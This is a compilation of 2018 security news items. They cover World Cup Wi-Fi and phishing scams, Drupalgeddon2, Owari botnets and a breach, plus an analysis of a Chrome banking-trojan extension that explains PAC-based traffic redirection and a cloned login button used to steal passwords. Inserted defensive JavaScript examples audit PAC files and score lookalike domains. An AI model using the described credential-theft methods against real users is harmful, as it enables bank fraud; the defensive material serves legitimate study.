

FIFA public Wi-Fi guide: which host cities have the most secure networks?
8.6.2018 Kaspersky Security
We all know how easy it is for users to connect to open Wi-Fi networks in public places. Well, it is equally straightforward for criminals to position themselves near poorly protected access points – where they can intercept network traffic and compromise user data.

A lack of essential traffic encryption for Wi-Fi networks where official and global activities are taking place – such as at locations around the forthcoming FIFA World Cup 2018 – offers especially fertile ground for criminals.

With this in mind, can football fans feel digitally safe in host cities? How does the situation with Wi-Fi access differ from town to town? To answer these questions, we have analyzed existing reliable and unreliable access points in 11 FIFA World Cup host cities – Saransk, Samara, Nizhny Novgorod, Kazan, Volgograd, Moscow, Ekaterinburg, Sochi, Rostov, Kaliningrad, and Saint Petersburg.

The research draws on telemetry from a feature that aims to secure users’ Wi-Fi connections and turn on a VPN when needed. Statistics were generated from users who voluntarily agreed to having their data collected. For the research, we only evaluated the security of public Wi-Fi spots. Even with relatively few public Wi-Fi spots in small towns, we still obtained a sufficient base for analysis: almost 32,000 Wi-Fi hotspots. While checking encryption and authentication algorithms, we counted the number of WPA2 and open networks, as well as their share among all the access points.

Security of Wireless Networks in FIFA World Cup host cities
Using the methodology described above, we have evaluated the security of Wi-Fi access points in 11 FIFA World Cup 2018 host cities.

Encryption types used in public Wi-Fi hotspots in FIFA World Cup host cities

Over a fifth (22.4%) of Wi-Fi hotspots in FIFA World Cup 2018 host cities use unreliable networks. This means that criminals simply need to be located near an access point to grab the traffic and get their hands on user data.

Around three quarters of all access points use encryption based on the Wi-Fi Protected Access (WPA/WPA2) protocol family, which is considered to be one of the most secure. The level of protection mostly depends on the settings, such as the strength of the password set by the hotspot owner. A complex encryption key can take years to crack.

It should also be noted that even reliable networks, like WPA2, cannot be automatically considered totally secure. They are still susceptible to brute-force, dictionary, and key reinstallation attacks, for which a large number of tutorials and open-source tools are available online. Traffic on a WPA-protected public access point can also be intercepted by an attacker who gets between the access point and the device at the beginning of the session.

Encryption types used in public Wi-Fi hotspots in FIFA World Cup host cities

The safest city (in terms of public Wi-Fi) turned out to be Saransk, with 72% of access points secured by WPA/WPA2 protocol encryption.

The top-three cities with the highest proportion of unsecured connections are Saint Petersburg (48% of Wi-Fi access points are unsecured), Kaliningrad (47%) and Rostov (44%).

Again, the results are relative. Even a WPA2 connection in a cafe cannot be considered secure if the password is visible to everyone. Nevertheless, we believe that the methodology used represents the Wi-Fi hotspot security situation in the host cities with a fair degree of accuracy.

The results of this research show that the security of Wi-Fi connections in FIFA World Cup host cities varies. We therefore recommend that users follow some key safety rules.

Recommendations for Users
If you are going to visit any of the FIFA World Cup 2018 host cities and use open Wi-Fi networks while you are there, remember to follow these simple rules to help protect your personal data:

Whenever possible, connect via a Virtual Private Network (VPN). With a VPN, encrypted traffic is transmitted over a protected tunnel, meaning that criminals won’t be able to read your data, even if they gain access to it. For example, the Kaspersky Secure Connection VPN solution can switch on automatically when a connection is not safe.
Do not trust networks that are not password-protected, or have easy-to-guess or easy-to-find passwords.
Even if a network requests a strong password, you should remain vigilant. Fraudsters can find out the network password at a coffee shop, for example, and then create a fake connection using the same password. This allows them to easily steal personal user data. You should only trust network names and passwords given to you by the employees of an establishment.
To maximize your protection, turn off your Wi-Fi connection whenever you are not using it. This will also save your battery life. We recommend you also disable automatic connections to existing Wi-Fi networks.
If you are not 100% sure that the wireless network you are using is secure, but you still need to connect to the Internet, try to limit yourself to basic user actions such as searching for information. You should refrain from entering your login details for social networks or mail services, and definitely do not perform any online banking operations or enter your bank card details anywhere. This will avoid situations where your sensitive data or passwords are intercepted and then used for malicious purposes later on.
To avoid becoming a cybercriminal target, you should enable the “Always use a secure connection” (HTTPS) option in your device settings. Enabling this option is recommended when visiting any websites you think may lack the necessary protection.
One example of a dedicated solution is the Secure Connection tool included in the latest versions of Kaspersky Internet Security and Kaspersky Total Security. This module protects users who are connected to Wi-Fi networks by providing them with a secure encrypted connection channel. Secure Connection can be launched manually or, depending on the settings, activated automatically when connecting to public Wi-Fi networks, when navigating to online banking and payment systems or online stores, and when communicating online (via mail services, social networks, etc.).

A MitM extension for Chrome
8.6.2018 Kaspersky
Browser extensions make our lives easier: they hide obtrusive advertising, translate text, help us choose in online stores, etc. There are also less desirable extensions, including those that bombard us with advertising or collect information about our activities. These pale into insignificance, however, when compared to extensions whose main aim is to steal money. To protect our customers, we automatically process large numbers of extensions from a variety of sources. This includes downloading and analyzing suspicious extensions from Chrome Web Store. One extension, in particular, recently caught our attention because it communicated with a suspicious domain.

The Google Chrome extension named Desbloquear Conteúdo (which means ‘Unblock Content’ in Portuguese) targeted users of Brazilian online banking services – all the attempted installations that we traced occurred in Brazil. The aim of this malicious extension is to harvest user logins and passwords and then steal money from their bank accounts. Kaspersky Lab products detect the extension as HEUR:Trojan-Banker.Script.Generic.

Geographic distribution of security product detections of the script fundo.js, one of the extension components

By the time of publication, the malicious extension had already been removed from Chrome Web Store.

The malicious extension in Chrome Web Store

Analysis of malicious extension
Malicious browser extensions often use different techniques (e.g. obfuscation) to prevent detection by security software. The developers of this specific extension, however, didn’t obfuscate its source code, opting instead for a different approach. This piece of malware uses the WebSocket protocol for data communication, making it possible to exchange messages with the C&C server in real time. This means the C&C starts acting as a proxy server to which the extension redirects traffic when the victim visits the site of a Brazilian bank. Essentially, this is a man-in-the-middle attack.

The Desbloquear Conteúdo extension consists of two JS scripts. Let’s take a closer look at them.

The first thing that catches the eye in the script’s code is the function websocket_init(). This is where a WebSocket connection is established. Data is then downloaded from the server (ws://exalpha2018[.]tk:2018) and saved to chrome.storage under the key ‘manualRemovalStorage’.

Download of data from C&C via a WebSocket connection

Data downloaded and saved by the extension

As a result of contacting hxxp://exalpha2018[.]tk/contact-server/?modulo=get, the extension receives the IP address to which user traffic will be redirected.

IP address received from C&C server

The IP to which all user traffic is then redirected

It’s worth mentioning here the Proxy Auto Configuration technology. Modern browsers use a special file written in JavaScript which has just one function: FindProxyForURL. With this function, the browser defines which proxy server to use to establish a connection to various domains.

The fundo.js script uses Proxy Auto Configuration when the function implement_pac_script is called. This replaces FindProxyForURL with a new function that redirects user traffic to the malicious server, but only when the user visits the web page of a Brazilian bank.
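The selective redirection described above leaves a trace that a defender can check: the PAC script the browser is configured with returns a proxy for a handful of hosts and DIRECT for everything else. The following is an added example, not code from the Kaspersky write-up or from the extension. It is a small offline evaluator for PAC scripts that runs FindProxyForURL for a list of URLs and groups hosts by the proxy decision, so that any proxy not on an allow-list stands out. The helper names (isPlainHostName, dnsDomainIs, shExpMatch) are the standard PAC helpers re-implemented here; the sample PAC text, the proxy addresses and the URL list are constructed for this example.

```javascript
// Added example (not code from the Kaspersky write-up or the extension): a small
// offline evaluator for Proxy Auto-Configuration (PAC) scripts, so a defender can
// audit which hosts a PAC file would hand to a proxy. The helper names below are
// the standard PAC helpers; the sample PAC text, proxy addresses and URL list are
// constructed for this example and are not from the page.

// Minimal re-implementations of the PAC helper functions a browser normally provides.
const pacHelpers = {
  isPlainHostName: (host) => host.indexOf(".") === -1,
  dnsDomainIs: (host, domain) =>
    host.length >= domain.length && host.slice(-domain.length) === domain,
  shExpMatch: (str, pattern) => {
    // Shell-style glob: "*" matches anything, "?" one character; everything else is literal.
    const escaped = pattern.replace(/[.+^${}()|[\]\\]/g, "\\$&");
    return new RegExp("^" + escaped.replace(/\*/g, ".*").replace(/\?/g, ".") + "$").test(str);
  },
};

// Run the PAC script's FindProxyForURL for one URL without a browser.
function evaluatePac(pacSource, url) {
  const host = new URL(url).hostname;
  const names = Object.keys(pacHelpers);
  const run = new Function(...names, "url", "host", pacSource + "\nreturn FindProxyForURL(url, host);");
  return String(run(...Object.values(pacHelpers), url, host)).trim();
}

// Group hosts by the proxy decision the PAC script makes for them.
function auditPac(pacSource, urls) {
  const report = { direct: [], proxied: {} };
  for (const url of urls) {
    const host = new URL(url).hostname;
    const decision = evaluatePac(pacSource, url);
    if (decision === "DIRECT") {
      report.direct.push(host);
    } else {
      if (!report.proxied[decision]) report.proxied[decision] = [];
      report.proxied[decision].push(host);
    }
  }
  return report;
}

// Anything routed to a proxy that is not on the organisation's allow-list is the
// pattern the article describes: a few sites quietly sent to an unknown server.
function unexpectedProxies(report, allowedProxies) {
  return Object.entries(report.proxied)
    .filter(([proxy]) => !allowedProxies.includes(proxy))
    .map(([proxy, hosts]) => ({ proxy, hosts }));
}

// Constructed sample PAC: a legitimate intranet rule plus one rule that should be flagged.
const SAMPLE_PAC = `
function FindProxyForURL(url, host) {
  if (isPlainHostName(host) || dnsDomainIs(host, ".intranet.example")) {
    return "PROXY 10.0.0.1:3128";
  }
  if (shExpMatch(host, "*.bank.example")) {
    return "PROXY 203.0.113.5:8080";
  }
  return "DIRECT";
}`;

// Constructed URL list to audit the sample PAC against.
const SAMPLE_URLS = [
  "https://www.example.org/",
  "http://search.example.net/?q=1",
  "http://wiki.intranet.example/",
  "https://login.bank.example/auth",
  "http://printer/",
];

const sampleReport = auditPac(SAMPLE_PAC, SAMPLE_URLS);
console.log(JSON.stringify(sampleReport, null, 2));
console.log("unexpected:", JSON.stringify(unexpectedProxies(sampleReport, ["PROXY 10.0.0.1:3128"])));
```

The evaluator deliberately runs the PAC text with only the three helpers it needs and no browser globals, so a script that tries to do anything other than return a proxy string simply fails. In practice the URL list would be the organisation's list of sensitive sites (banking, mail, identity providers) and the allow-list the proxies that are actually deployed.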

Changing browser settings to redirect user traffic

In the second script, pages.js, the following section of code is the most important:

Execution of the downloaded malicious code on web pages belonging to banks

Just like with fundo.js, data downloaded from the server is saved to manualRemovalStorage. The data includes the domains of several Brazilian banks and the code the browser should execute if a user visits one of the relevant sites.

pages.js downloads the following scripts from the domain ganalytics[.]ga and launches them on the banks’ sites:


Web Antivirus detection statistics for attempts to contact ganalytics[.]ga

All the above scripts have similar functionalities and are designed to steal the user’s credentials. Let’s take a look at one of them.

One of this script’s functions is to add specific HTML code to the main page of the online banking system.

Addition of malicious code to the web page

A closer look at the code that’s returned after contacting the server reveals that it’s needed to collect the one-time passwords used for authentication on the bank’s site.

Interception of users’ one-time passwords

If the user is on the page where the login and password are entered, the script creates a clone of the ‘Enter’ button, together with a function that handles clicks on it. This function stores the password in cookies for subsequent transfer to the C&C and then clicks the real button, which is overlaid and hidden from the victim.

Copy of the ‘Enter’ button is created and the login and password for an online banking service are intercepted

As a result, the password to the user’s account is sent to the online banking system as well as to the malicious server.

Sending of all intercepted data to the C&C

Additional analysis of the web resources used in the attack (courtesy of the KL Threat Intelligence Portal) yields some interesting information. In particular, the aforementioned ganalytics[.]ga is registered in the Gabon domain zone, which is why WHOIS services don’t provide much information about it:

WHOIS info for ganalytics[.]ga

However, the IP address where it’s hosted is also associated with several other interesting domains.

A fragment of DNS data from KSN

It’s clear that this IP address is (or was) associated with several other domains with tell-tale names containing the keywords advert, stat, analytic and registered in Brazil’s domain zone. It’s noteworthy that many of them were involved in distributing web miners last autumn, with the mining scripts being downloaded when legitimate Brazilian bank sites were visited.

Fragments of KSN data related to advstatistics.com[.]br

When malware is loaded while the user is visiting a legitimate site, it usually indicates that traffic is being modified locally on the user’s computer. Other aspects of this case, namely that it targeted Brazilian users and used the same IP address as previous attacks, suggest that this browser extension (or related versions of it) earlier had functionality to add cryptocurrency mining scripts to the banking sites users were visiting at the time the extension was downloaded to their devices.

Browser extensions designed to steal logins and passwords are quite rare. However, they need to be taken seriously given the potential damage they could cause. We recommend that users only install verified extensions with large numbers of installations and reviews in Chrome Web Store or another official service. In spite of the protection measures implemented by the owners of such services, malicious extensions can still end up being published in them – we’ve covered one such case. Also, it wouldn’t hurt to have a security product installed on your device that issues a warning whenever an extension acts suspiciously.

2018 Fraud World Cup
8.6.2018 Kaspersky CyberCrime

There are only two weeks to go before the start of the massive soccer event — FIFA World Cup. This championship has already attracted the attention of millions worldwide, including a fair few cybercriminals. Long before kick-off, email accounts began bulging with soccer-related spam, and scammers started exploiting the topic in mailings and creating World Cup-themed phishing pages.

Our statistics show spikes in the number of phishing pages during match ticket sales. Every time tickets went on sale, fraudsters mailed out spam and activated clones of official FIFA pages and sites offering fake giveaways allegedly from partner companies. But as the event draws nearer, cyber scams are reaching fever pitch. We present our observations below.

Fake lottery win notifications
One of the main types of World Cup-related email fraud is spam informing recipients of cash winnings in lotteries supposedly held by official partners and sponsors (Visa, Coca-Cola, Microsoft, etc.), as well as FIFA itself.

Examples of fake lottery win notifications

Such messages contain attachments (usually PDF or DOCX documents) in which the “winner” is congratulated and told to forward detailed contact details (name, date of birth, address, email, telephone no.) in order to receive the prize. Sometimes recipients are asked to pay a part of the postage or bank transfer fees.

Such mailouts are aimed primarily at harvesting user data (including financial), plus picking up a small money transfer. Such messages can also contain malicious attachments, for example, Trojan-Banker programs.

Examples of fake notifications with attached documents

Another type of common spam fraud is an offer to take part in a ticket giveaway or win a trip to a match. Victims are required either to register on a fake promotion page and provide an email address, or, as in the case of lottery emails, to send the “organizers” their contact details. Such messages are sent in the name of FIFA, usually from addresses on recently registered domains. The purpose of such schemes is mainly to update email databases so as to distribute yet more spam.

Examples of messages with ticket and trip giveaways

Advertising spam
In the runup to the championship, we registered a lot of advertising spam with offers for soccer merchandise, transport/accommodation services, and travel packages from various tour operators. Merchandise was generally offered by small online retailers and included toys, souvenirs, and stationery marked with official logos, as well as soccer jerseys for all teams taking part. Some messages even resemble mailings from the official FIFA store.

Examples of messages offering merchandise

There was also spam unrelated to soccer, for example traditional spam offering medical products but using the World Cup to attract attention. Interestingly, the message subject referred to the 2006 World Cup final. Perhaps the spammers used an old template and forgot to change the date.

Wrong year, same product

Ticket sales
Besides online stores selling merchandise, there are plenty of sites offering match tickets, both fake and real. But real doesn’t necessarily mean bona fide: they are often sold by ticket scalpers exploiting various loopholes in the FIFA rules.

Online scalpers selling tickets for an arm and a leg

However, official tickets can only be bought on the official FIFA website, and large fines are imposed for their illegal sale or resale. Those who use the services of speculators risk being turned away at the stadium: tickets are personalized, and if the bearer fails to show ID matching the information in the ticket, FIFA staff have the right to refuse entry.

Fake sites and messages from partners
One of the most popular ways to steal credentials for bank and other accounts is to create counterfeit imitations of official partner websites. Partner organizations quite often arrange ticket giveaways for clients, and this is what attackers exploit to lure users onto fake promotion sites. Such pages look very convincing: well-designed with a working interface, hard to tell from the real thing.

Phishing login page supposedly of a partner bank

Attempt to gain access to an account on a partner company site under the guise of a ticket giveaway

Scammers also try to extract data by mimicking official FIFA notifications. The victim is informed that the security system has been updated and all personal data must be re-entered to avoid lockout. The link in the message takes the victim far away from FIFA to a fake personal account. Naturally, all data entered flows straight to the scammers.

Example of a phishing email seemingly from FIFA

Cybercriminals are particularly keen to target clients of Visa, the tournament’s commercial sponsor, and offer prize giveaways in the name of this international payment heavyweight. To take part, users need to follow a link that unsurprisingly points to a phishing site (the domain was registered a couple of months ago and has nothing to do with the payment system), where they are asked to enter their bank card details, including the CVV/CVC code.

Example of a message and phishing page in the name of Visa

Fraud allsorts
Alongside social engineering, phishers deploy malicious programs in the pursuit of users’ personal data and cash. For example, a fake site offering online broadcasts can plant malware on the victim’s computer under the guise of a Flash Player update required to view the match.

In some cases, phishers have no interest at all in bank accounts and payment details. For instance, under the pretext of receiving a World Cup-themed update for the video game FIFA Soccer, users are prompted to enter their account credentials for the Origin platform on a fake login page. If there are games of interest under the victim’s profile, the cybercriminals change the login/password and link the account to a new email address for subsequent resale.

Fake Origin login page

In late May, a few weeks before the start of the championship, phishing emails offering cheap flights from the major airlines were all the rage. In addition to fake soccer ticket giveaways, there were draws seemingly on behalf of airlines offering free plane tickets.

Fake ticket giveaway in the name of a major airline

Tricks of the trade
To make their sites seem credible, cybercriminals register domain names combining the words “world,” “worldcup,” “FIFA,” “Russia,” etc. (for example: worldcup2018, russia2018, fifarussia). Normally, though not always, such domains look unnatural (for instance, fifa.ucozx.site) and have a non-standard domain extension. So in most cases, a close look at the link in the email or the URL after opening the site should be enough to avoid the bait.

DNS WHOIS data for phishing sites

Likewise with a view to lulling user vigilance, cybercriminals acquire the cheapest SSL certificates available: relevant authorities often fail to verify the existence of the entity acquiring the certificate, meaning that the scammers get the all-important HTTPS in front of their address. To spot a fake, it is enough to look at the domain’s WHOIS data. Scam websites tend to have been registered quite recently and for a short time, and their owners are usually private individuals. What’s more, detailed information about the owner is often hidden.
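The two paragraphs above list indicators that can be checked mechanically: themed keywords in a hostname that is not the official site, an unnatural subdomain on an unrelated domain, a non-standard extension, and WHOIS data showing a very recent, short registration with hidden owner details. The following is an added example, not code from the Kaspersky article, that turns those indicators into a simple scoring function over hostnames and optional WHOIS records. The keyword list is taken from the article; the official-domain list (fifa.com), the “common TLD” list, the score weights and thresholds, and the sample hosts and WHOIS records are assumptions constructed for this example.

```javascript
// Added example (not code from the Kaspersky article): a scoring heuristic for
// World Cup-themed lookalike domains, built from the indicators the article lists.
// The keyword list comes from the article; the official-domain list, the "common
// TLD" list, the score weights and the sample hosts and WHOIS records are
// assumptions constructed for this example.

const THEME_KEYWORDS = ["worldcup", "world", "fifa", "russia"];
const OFFICIAL_DOMAINS = ["fifa.com"];           // assumption: the official FIFA site
const COMMON_TLDS = ["com", "org", "net", "ru"]; // assumption: extensions a fan would expect
const DAY_MS = 24 * 60 * 60 * 1000;

// Naive registrable-domain extraction (last two labels). No public-suffix list,
// so multi-part suffixes such as co.uk are not handled by this example.
function registrableDomain(host) {
  return host.toLowerCase().split(".").slice(-2).join(".");
}

// whois (optional): { created: Date, expires: Date, registrantHidden: boolean }
function scoreHost(host, whois, now) {
  const h = host.toLowerCase();
  const reasons = [];
  let score = 0;
  if (!THEME_KEYWORDS.some((k) => h.includes(k))) {
    return { host, score, reasons, verdict: "benign" };
  }
  const domain = registrableDomain(h);
  if (OFFICIAL_DOMAINS.includes(domain)) {
    return { host, score, reasons: ["official domain"], verdict: "benign" };
  }
  score += 2;
  reasons.push("themed keyword outside the official domain");
  const tld = h.split(".").pop();
  if (!COMMON_TLDS.includes(tld)) {
    score += 1;
    reasons.push("uncommon TLD ." + tld);
  }
  // e.g. fifa.ucozx.site: the keyword lives in a subdomain of an unrelated domain.
  if (!THEME_KEYWORDS.some((k) => domain.includes(k))) {
    score += 1;
    reasons.push("keyword only in a subdomain of an unrelated domain");
  }
  if (whois) {
    const ageDays = (now - whois.created) / DAY_MS;
    const termDays = (whois.expires - whois.created) / DAY_MS;
    if (ageDays < 90) { score += 1; reasons.push("registered less than 90 days ago"); }
    if (termDays <= 366) { score += 1; reasons.push("registered for one year or less"); }
    if (whois.registrantHidden) { score += 1; reasons.push("registrant details hidden"); }
  }
  return { host, score, reasons, verdict: score >= 3 ? "suspicious" : "review" };
}

function scoreAll(samples, now) {
  return samples.map((s) => scoreHost(s.host, s.whois, now));
}

// Constructed sample: the official host, the hostname quoted in the article,
// an invented lookalike under the reserved .example TLD, and an unrelated host.
const NOW = new Date(Date.UTC(2018, 5, 8));
const SAMPLE_HOSTS = [
  { host: "www.fifa.com", whois: null },
  { host: "fifa.ucozx.site",
    whois: { created: new Date(Date.UTC(2018, 3, 1)), expires: new Date(Date.UTC(2019, 3, 1)), registrantHidden: true } },
  { host: "worldcup2018-tickets.example",
    whois: { created: new Date(Date.UTC(2018, 4, 20)), expires: new Date(Date.UTC(2019, 4, 20)), registrantHidden: false } },
  { host: "news.example.org", whois: null },
];

console.log(JSON.stringify(scoreAll(SAMPLE_HOSTS, NOW), null, 2));
```

Only the keyword match is a hard requirement; the remaining indicators add to a score so that a single weak signal (a new registration, say) does not by itself condemn a domain, while a themed hostname on an odd extension with a fresh, short, anonymised registration scores well above the threshold.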

Besides active domain names, we logged a large number of “sleepers”: on them you might find a placeholder page, if that. Cybercriminals use them as a backup: if one domain is blocked, the site moves to the next.

Examples of backup domain names

The above describes only the most popular scams exploiting the World Cup theme. Nevertheless, it provides a fairly complete picture of how cybercriminals operate and what they want. In addition to the above, we expect shortly to see an explosion of phishing sites offering cheap airline tickets to World Cup host cities, as well as fake mailings supposedly from popular accommodation services with “special offers.”

To avoid being duped, follow these simple rules:

Buy tickets only on the official FIFA website or at official ticket offices.
For online purchases (not only during the tournament), get a separate bank card and set a spending limit.
Do not open links or attachments in emails from unknown senders, even if they seem legitimate.
Check the addresses of links in notifications from known services; at the slightest suspicion, do not click, but open the site manually in the browser.
To preserve your money and nerves, never buy products advertised in spam.
Use the latest security solutions to protect against cyberthreats, and keep the databases up-to-date.

Marcus Hutchins, WannaCry-killer, hit with four new charges by the FBI
8.6.2018 thehackernews  Crime

Marcus Hutchins, the British malware analyst who helped stop the global WannaCry outbreak, is now facing four new charges related to malware he allegedly created and promoted online to steal financial information.
Hutchins, the 24-year-old better known as MalwareTech, was arrested by the FBI last year as he was headed home to England from the DefCon conference in Las Vegas for his alleged role in creating and distributing Kronos between 2014 and 2015.
Kronos is a Banking Trojan designed to steal banking credentials and personal information from victims' computers, which was sold for $7,000 on Russian online forums, and the FBI accused Hutchins of writing and promoting it online, including via YouTube.

Hutchins pleaded not guilty at a court hearing in August 2017 in Milwaukee and was released on $30,000 bail.
However, earlier this week, a revised superseding indictment [PDF] was filed with the Wisconsin Eastern District Court, under which Hutchins faces four new charges along with the six prior counts filed against him by the FBI a month before his arrest.
Marcus Accused of Creating and Selling Another Malware
According to the new indictment, Hutchins created a second piece of malware, known as "UPAS Kit," and also lied to the Federal Bureau of Investigations (FBI) when he was arrested and questioned last year in Las Vegas.
As described by prosecutors, UPAS Kit is a spybot that "allowed for the unauthorized exfiltration of information from protected computers" and "used a form grabber and web injects to intercept and collect personal information," including credit card details.
UPAS Kit was advertised as able to "install silently and not alert antivirus engines," at prices above $1,000 back in 2012.
According to the indictment, Hutchins created UPAS Kit in 2012, when he was just 18, and sold it online to another unnamed co-defendant identified as "VinnyK" (aka Aurora123), who was also involved in promoting Kronos.

VinnyK then sold UPAS Kit to another person in Wisconsin in 2012, who allegedly used the malware to attack computers in the United States.
Two other charges relate to Hutchins "aiding and abetting" the distribution of invasive code in an attempt to damage "10 or more protected computers," and helping others to hack computers for financial gain.
Marcus Appealed to his Followers for Donations to Cover Legal Costs
As the news on the revised indictment broke, Hutchins, who has repeatedly denied any illegal activity, called the charges "bullshit" and appealed to his Twitter followers for donations to cover legal costs.
"Spend months and $100k+ fighting this case, then they go and reset the clock by adding even more bullshit charges like 'lying to the FBI,'" Hutchins wrote on his Twitter, calling for donations by adding a quote from Starcraft video game: "We require more minerals."
Hutchins' lawyer Brian Klein called the charges "meritless" and said he expects his client to be cleared of all charges.
"[We] are disappointed the govt has filed this superseding indictment, which is meritless," Klein tweeted. "It only serves to highlight the prosecution's serious flaws. We expect [Hutchins] to be vindicated and then he can return to keeping us all safe from malicious software."
Hutchins, who is living in Los Angeles on bail, is unable to leave the United States since last year due to his pending criminal charges.
Hutchins shot to fame and was hailed as a hero last year when he accidentally stopped the global WannaCry ransomware epidemic that crippled computers across the world.

Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon2 Exploit
8.6.2018 thehackernews 

Hundreds of thousands of websites running on the Drupal CMS—including those of major educational institutions and government organizations around the world—have been found vulnerable to a highly critical flaw for which security patches were released almost two months ago.
Security researcher Troy Mursch scanned the whole Internet and found over 115,000 Drupal websites are still vulnerable to the Drupalgeddon2 flaw despite repetitive warnings.

Drupalgeddon2 (CVE-2018-7600) is a highly critical remote code execution vulnerability discovered late March in Drupal CMS software (versions < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1) that could allow attackers to completely take over vulnerable websites.
For those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or standard Drupal installations under the privileges of the user.
Since Drupalgeddon2 was likely to attract motivated attackers, the Drupal team urged all website administrators to install the security patches immediately after their release in late March and initially decided not to publish any technical details of the flaw.

However, attackers started exploiting the vulnerability only two weeks after complete details and proof-of-concept (PoC) exploit code of Drupalgeddon2 was published online, which was followed by large-scale Internet scanning and exploitation attempts.

Shortly after that, attackers developed automated exploits for the Drupalgeddon2 vulnerability to inject cryptocurrency miners, backdoors, and other malware into websites, within a few hours of the details going public.
Mursch scanned the Internet and found nearly 500,000 websites were running on Drupal 7, out of which 115,070 were still running an outdated version of Drupal vulnerable to Drupalgeddon2.
While analyzing vulnerable websites, Mursch noticed that hundreds of them—including those of a Belgian police department, the Colorado Attorney General's office, Fiat subsidiary Magneti Marelli, and a food truck locating service—have already been targeted by a new cryptojacking campaign.
Mursch also found some infected websites in the campaign that had already upgraded their sites to the latest Drupal version, but the cryptojacking malware still existed.
We have been warning users since March that if you are already infected with the malware, merely updating your Drupal website would not remove the "backdoors or fix compromised sites." To fully resolve the issue you are recommended to follow this Drupal guide.

IoT Botnets Found Using Default Credentials for C&C Server Databases
8.6.2018 thehackernews  IoT  BotNet

Not following cybersecurity best practices could not only cost online users but also cost cybercriminals. Yes, sometimes hackers don't take best security measures to keep their infrastructure safe.
A variant of the Owari IoT botnet, which relies on default or weak credentials to hack insecure IoT devices, was itself found using default credentials for the MySQL server integrated with its command and control (C&C) server, allowing anyone to read and write its database.
Ankit Anubhav, principal security researcher at IoT security firm NewSky Security, who found the botnets, published a blog post about his findings earlier today, detailing how the botnet authors themselves kept an incredibly weak username and password combination for their C&C server's database.

Guess what the credentials could be?
Username: root
Password: root
These login credentials helped Anubhav gain access to the botnet and fetch details about infected devices, the botnet authors who control the botnet and also some of their customers (a.k.a. black box users), who have rented the botnet to launch DDoS attacks.
"Besides credentials, duration limit such as for how much time the user can perform the DDoS, maximum available bots for attack (-1 means the entire botnet army of the botmaster is available) and cooldown time (time interval between the two attack commands) can also be observed," Anubhav wrote.

Besides this, Anubhav was also able to see the duration limit of the attack such as for how long a client can perform the DDoS attack, maximum available bots for an attack, and the list of various IPs targeted by the DDoS attack.
Anubhav also found another botnet, which was also built with a version of Owari and its database was also exposed via weak credentials.
The C&C servers of both the botnets were located at and, which are now offline, as "botnet operators are aware that their IPs will be flagged soon due to the bad network traffic," Anubhav wrote. "Hence to stay under the radar, they often voluntarily change attack IPs."

All New Privacy and Security Features Coming in macOS 10.14 Mojave
8.6.2018 thehackernews  Apple

At Worldwide Developer Conference 2018 on Monday, Apple announced the next version of its macOS operating system, and it's called Mojave.
Besides introducing new features and improvements of macOS 10.14 Mojave—like Dark Mode, Group FaceTime, Dynamic Desktop, and Finder—at WWDC, Apple also revealed a bunch of new security and privacy features coming with the next major macOS update.
Apple CEO Tim Cook said the new features included in Mojave are "inspired by pro users, but designed for everyone," helping you protect from various security threats.
Here's a list of all macOS Mojave security and privacy features:
Safari's Enhanced "Intelligent Tracking Prevention"
It's no longer shocking that your online privacy is being invaded, and everything you search online is being tracked—thanks to third-party trackers present on the Internet in the form of social media "Like" and "Share" buttons that marketers and data brokers use to monitor web users as they browse.

But not anymore. With macOS Mojave, Safari has updated its "Intelligent Tracking Prevention"—a feature that limits websites' ability to track users with various ad-tracking and device fingerprinting techniques.
The all-new enhanced Intelligent Tracking Prevention will now automatically block all third-party trackers, including social media "Like" or "Share" buttons, as well as comment widgets from tracking users without their permission.
Safari will also help in defeating the "device fingerprinting" approach by exposing only generic configuration information of users' device and default fonts.
End-to-End Encrypted Group FaceTime (Up to 32 People)

This is a significant security improvement: at WWDC 2018, Apple introduced a group FaceTime feature that lets groups of up to 32 people hold video calls at the same time, with end-to-end encryption just like the existing one-to-one audio and video calls and group audio calls.
End-to-end encryption for group calls in the FaceTime app means that there is no way for Apple or anyone else to decrypt the data while it is in transit between devices.
macOS Mojave Will Alert When Your Camera & Mic Are Accessed
As we reported several times in the past few years, cybercriminals have been spreading new malware for macOS that targets the built-in webcam and microphone to spy on users without detection.

To address this threat, macOS Mojave adds a new feature that monitors access to your macOS webcam/microphone and alerts you with new permission dialogues whenever an app tries to access the camera or microphone.
This new protection has primarily been designed to prevent malicious software from silently turning on these device features in order to spy on its users.
User Permissions for Excessive Data Access Requests
macOS Mojave also adds similar permission requirements for apps to access personal data like the mail database, message history, file system and backups.
By default, the macOS Mojave will also protect your location information, contacts, photos, Safari data, mail database, message history, iTunes device backups, calendar, reminders, time machine backups, cookies, and more.
Secure (and Convenient) Password Management
We have long warned users to deploy a good password practice by keeping their passwords strong and unique for every website or service. Now, Apple has made it easier in macOS 10.14 Mojave and iOS 12.
While Safari in macOS has provided password suggestions for years when users are asked to create a login at a site, Apple has improved this feature in a way that Safari now automatically generates strong passwords, enters them into the web browser, and stores them in the iCloud keychain when users create new online accounts.
Previously, third-party password manager apps handled much of this, and now Apple is integrating such functionality directly into the next major versions of both macOS and iOS.

The company also announced a new feature that even flags reused passwords so that users can change them, a new interface that autofills one-time passwords provided by authentication apps, and a mechanism that shares passwords across all of a user's nearby devices, including iOS devices, Macs, and Apple TVs.
macOS Mojave Moves Software Updates from App Store to System Preferences
With the new macOS Mojave, Apple has also slightly redesigned its Mac App Store and moved the system update mechanism from the Mac App Store to System Preferences.
Apple has reintroduced the "Software Update" option in the System Preferences window, allowing users to update their operating system and native software without opening the App Store.
Moreover, Apple has also confirmed that Mojave will be its last version of macOS to support legacy 32-bit apps.
Similar to High Sierra, users will be shown a dialog box when opening 32-bit apps in macOS 10.14 Mojave (beta 1) with a message telling them that "This app will not work with future versions of macOS."

MyHeritage Says Over 92 Million User Accounts Have Been Compromised
8.6.2018 thehackernews Incident

MyHeritage, the Israel-based DNA testing service designed to investigate family history, has disclosed that the company website was breached last year by unknown attackers, who stole the login credentials of more than 92 million of its customers.
The company learned about the breach on June 4, 2018, after an unnamed security researcher discovered a database file named "myheritage" on a private server located outside of the company and shared it with the MyHeritage team.

After analyzing the file, the company found that the database, which included the email addresses and hashed passwords of nearly 92.3 million users, belonged to customers who signed up for the MyHeritage website before October 27, 2017.
While the MyHeritage security team is still investigating the data breach to identify any potential exploitation of its systems, the company confirmed that no other data, such as credit card details, family trees or genetic data, was breached, as such data is stored on separate systems.
